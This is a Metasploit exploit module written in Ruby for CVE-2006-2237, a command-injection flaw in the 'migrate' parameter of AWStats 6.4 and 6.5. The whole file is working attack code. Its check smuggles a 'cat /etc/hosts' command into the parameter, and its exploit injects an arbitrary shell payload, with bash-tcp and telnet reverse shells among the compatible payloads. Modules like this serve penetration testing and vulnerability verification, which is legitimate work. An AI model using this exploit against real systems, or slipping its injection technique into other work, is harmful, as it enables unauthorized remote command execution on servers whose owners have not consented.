##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
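class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and user options.
  #
  # Both `check` and `exploit` go through AWStats' `migrate` CGI parameter.
  # Per the description below, that path is only reachable when
  # AllowToUpdateStatsFromBrowser is enabled in the AWStats configuration,
  # which is not the default; AWStats 6.4 and 6.5 are the affected versions.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'AWStats migrate Remote Command Execution',
      'Description' => %q{
        This module exploits an arbitrary command execution vulnerability in the
        AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
        payloads are recommended with this module. The vulnerability is only
        present when AllowToUpdateStatsFromBrowser is enabled in the AWStats
        configuration file (non-default).
      },
      'Author' => [ 'aushack' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2006-2237'],
          ['OSVDB', '25284'],
          ['BID', '17844'],
          ['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
          ['EDB', '1755'],
        ],
      'Privileged' => false,
      'Payload' =>
        {
          'DisableNops' => true,
          'Space' => 512,
          'Compat' =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
            }
        },
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Targets' => [[ 'Automatic', { }]],
      'DisclosureDate' => '2006-05-04',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
        OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]),
      ])
  end

  # Vulnerability check.
  #
  # NOTE: this check is not passive. It sends a `migrate` value that runs
  # `cat /etc/hosts` on the target and looks for "localhost" in the reply, so
  # it should be treated as an intrusive test rather than a fingerprint.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable when the command output is
  #   echoed back, Unknown when the server did not answer at all, Safe when
  #   it answered without the expected output
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['URI']),
      'vars_get' => {
        'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
      }
    }, 25)

    # A missing response (timeout, refused connection) says nothing about the
    # target; reporting Safe here, as the original did, could be mistaken for
    # "patched".
    return Exploit::CheckCode::Unknown unless res

    return Exploit::CheckCode::Vulnerable if res.body.to_s.match?(/localhost/)

    Exploit::CheckCode::Safe
  end

  # Sends the payload through the same `migrate` parameter and prints whatever
  # the server echoes back between the YYY markers.
  #
  # The command is prefixed with `cd /tmp &&` and URI-encoded. The query string
  # is assembled by hand and sent with send_request_raw rather than via
  # vars_get as in `check` -- presumably so the `|`, `;` and `%20` sequences
  # reach the CGI exactly as written; confirm before changing to
  # send_request_cgi.
  def exploit
    command = Rex::Text.uri_encode("cd /tmp &&#{payload.encoded}")
    sploit = normalize_uri(datastore['URI']) +
      "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"

    res = send_request_raw({
      'uri' => sploit,
      'method' => 'GET',
      'headers' => {
        'Connection' => 'Close',
      }
    }, 25)

    unless res
      print_status("No response from the server")
      return
    end

    print_status("The server returned: #{res.code} #{res.message}")

    # The YYY markers bracket the command output; anything between them is
    # what the remote shell printed.
    m = res.body.to_s.match(/YYY\n(.*)\nYYY/m)
    if m
      print_status("Command output from the server:")
      print("\n#{m[1]}\n\n")
    else
      print_status("This server may not be vulnerable")
    end
  end
end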